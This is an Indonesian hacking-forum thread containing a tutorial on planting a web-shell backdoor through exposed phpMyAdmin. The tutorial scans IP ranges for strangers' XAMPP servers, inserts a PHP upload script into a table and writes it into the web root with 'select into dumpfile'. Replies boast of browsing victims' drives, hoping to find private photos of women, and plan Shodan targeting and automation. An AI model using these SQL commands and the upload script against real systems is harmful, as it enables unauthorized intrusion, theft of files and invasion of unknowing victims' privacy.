[Share] Inject Backdoor via PhpMyAdmin
#1
Selamat malam all member IBT, berawal dari praktek tutorial di trheadnya kang @sonyrimawan di http://www.indonesianbacktrack.or.id/for...-5981.html yang hasilnya g menyenangkan bagi ane ( karna ane gagal ) upload failed mulu ....
Ane brangkat ke warung ngutang rokok ama kopi buat temen begindang ... eh begadang maksudnya ....
Yang membuat ane penasara , toh udah masuk ke phpmyadmin masa g bisa ngapa2en ... :3 ( waktu itu ane merasa sedih )

Ane siapin peralatan tempur, berbekalkan sedikit pengetahuan dari install cms di localhost ane bulatkan tekat untuk BISA ... Big Grin

Peralatan tambahan yang ane gunain :

Angry Ip Scanner
Sedikit Script
Shell Backdoor (Disini ane menggunkana shell 3CArmy)

Oke .... pertama kita cari dulu targetnya menggunakan Anggry Ip Scanner :

Set Anggry Ip Scannernya seperti gambar di bawah ini :

Menu tools  >>> Preferences >> Pada tab port tambahkan port yg akan kita scan
berhubung server pada localhost biasanya menggunakan port 80 / 8080 maka settingan punya ane ane buat begindang

Spoiler! :
[Image: Screenshot_from_2015_11_10_23_12_05.png]

kemudian pada tab display pilih yang host with open port only

Spoiler! :
[Image: Screenshot_from_2015_11_10_23_14_29.png]

selanjutnya balik lagi pada menu tool >>>  Fetchers
Pindahkan web detect ke sebelah kiri seperti di gambar

Spoiler! :
[Image: Screenshot_from_2015_11_10_23_22_32.png]



oke , untuk setingan Anggry Ip Scanner nya kelar ...
Selanjutnya sebagai dasar untuk scann, disini ane menggunakan IP ane sendiri , misal IP ane 192.168.52.100

maka pada Angry Ip Scanner ane buat jadi seperti ini :

[spoiler][Image: Screenshot_from_2015_11_10_23_20_10.png]

kemudian scan dan cari yg seperti ini :

Spoiler! :
[Image: Screenshot_from_2015_11_10_23_27_31.png]

yap .. yang port apachenya open tentunya , karna dari situlah kita masuk Big Grin
NB : Tidak semua juga yang bisa , ada yg phpmyadminnya d password , ada yg memang hanya bisa di akses dari localhost/pc korban itu sendiri ( xampp terbaru kalo g salah )

setelah mendapatkan target, buka ip target tersebut di web browser, maka kita akan masuk ke halaman awal web servernya ( xampp, appserv, etc )

Spoiler! :
[Image: Screenshot_from_2015_11_10_23_32_00.png]

oke , disini kita mulai bermain dengan comand sql nya ...

pertama kita buat database baru untuk tempat backdoor yang akan kita masukkan
Quote:create database userform
Spoiler! :
[Image: Screenshot_from_2015_11_10_23_45_01.png]
NB : userform adalah nama database yang ane buat

Kemudian kita buat tabel dan collumnya dengan cara klik pada database yang sudah kita buat kemudian pilih SQL dan masukkan comand :
Quote:CREATE TABLE `userform`.`user` (
`form` longtext not null
) ENGINE = MYISAM ;

klik Go
NB: userform = nama database , user = nama tabel , form = nama column ( silahkan buat sesuka anda ), longtext = jenis data ( ane buat longtext karna script uploadnya lumayan panjang)

selanjutnya kita cek basedir nya dimana dengan comand :
Quote:select @@datadir

pada contoh ini ada di C:\xampp\mysql\data\
Spoiler! :
[Image: Screenshot_from_2015_11_10_23_53_59.png]

artinya target menggunkan xampp , dan dir xampp biasanya di : C:/xampp/htdocs
oke .. selanjutnya masih di tabel user, klik SQL dan masukkan script di bawah ini :
Quote:INSERT INTO `userform`.`user` (
`form`
)
VALUES (
'<title>Upload File</title>
<style type="text/css">
<!--
body,td,th {
color: #0F0;
}
body {
background-color: #999;
}
-->
</style><p>
<form method="POST" action="" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
<p>
<strong>
<?php
if ($_FILES[''file''] != '''') {
copy($_FILES[''file''][''tmp_name''], $_FILES[''file''][''name'']) or die (''Proses upload Gagal: '');
}else {
die(''Silahkan pilih file'');
}
?>
File berhasil diupload:<br />
Keterangan File:<br />
Nama File: <?php echo $_FILES[''file''][''name'']; ?><br />
Ukuran File: <?php echo $_FILES[''file''][''size''];?> Bytes <br />
Jenis File: <?php echo $_FILES[''file''][''type'']; ?></strong></p>

'
);

itu adalah script buat ngupload file backdoor kita nantinya ...

jika sukses maka akan muncul seperti ini :
Spoiler! :
[Image: Screenshot_from_2015_11_10_23_59_10.png]

Next Step masih di tabel user, buka lagi comand SQL dan masukkan comand :
Quote:select * into dumpfile 'C:/xampp/htdocs/upload.php' from user

NB:
C:/xampp/htdocs/ = dir xampp ( karna korban menggunakan xampp pada tutorial ini )
upload.php = nama file untuk script upload yg kita masukkan tadi pada langkah sebelumnya
from user = from (nama tabel)

Kemudian klik Go

coba buka urlnya : victimip/upload.php
terahir silahkan upload shell anda , untuk akses shell : victimip/namashell.php

Maaf untuk beberapa step terahir g ada gambarnya dikarnakan target ane udah offline . jadi hal ini hanya bisa dilakukan selama target online dan menjalankan server apachenya...

Jika ada yang kurang jelas monggo tanyain ....
Tutorial Created by Black-Ink ...
Salam
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#2
nice thread bro... btw targetnya kenapa offline bro, aturan dikasih link2 bagus dulu ke target biar onlinenya lama.. hehehe... pokoknya mantab buat threat ente bro..

#3
kagak tau ane knape die offline ...
wong kenal juga kagak ama targetnye :v
kan nyari target via scanning range IP doangan kang , jadi kalo hoki nemu laptop cewe kan siape tau ada foto anu anu nya :v

#SEGALA BENTUK PENYALAHGUNAAN DARI TUTORIAL INI DILUAR TANGGUNG JAWAB ANE :V
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#4
nyah tampilan webshell ane di target yg lain : http://s15.postimg.org/hr7pcguzv/Screens..._24_16.png

tinggal ubek2 smua drivenya kali aja nemu sesuatu :v
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#5
ane penasaran sama file atta Vs Okta.mp4 itu bro :v

#6
mungkin bisa ditambahin lagi , untuk bisa upload shell via php myadmin , seorang attacker harus mempunyai root privilagenya , sehingga berhasil upload shellnya Big Grin
nice share om
salam kenal
Djoe | Psycho Security |[email protected]

#7
Thumbs Up 
nice thread, ke depannya bikin artikel lagi yahh... soalnya ane masih perlu banyak belajar untuk ningkatin sikil

#8
nah kalo kita target nya IP Public gimana om? harus cari range IP nya juga atau gimana nih om @x_code
Twitter : Orang Sederhana
FB : Orang Sederhana
OrangSederhana@IBTeam:~#


#9
WOw... asik nih buat pelajarn baru...
<p>=========Cyberly================

Indonesian Backtrack Team Regional Aceh

" Walau diam tetap belajar"

GPComp</p>

#10
mantab bng..
cari targetnya bisa pake shodan..

http://www.indonesianbacktrack.or.id/for...61269.html
ini autonya...

rencananya ane pengen buat auto nanem shell in phpmyadmin






Users browsing this thread: 1 Guest(s)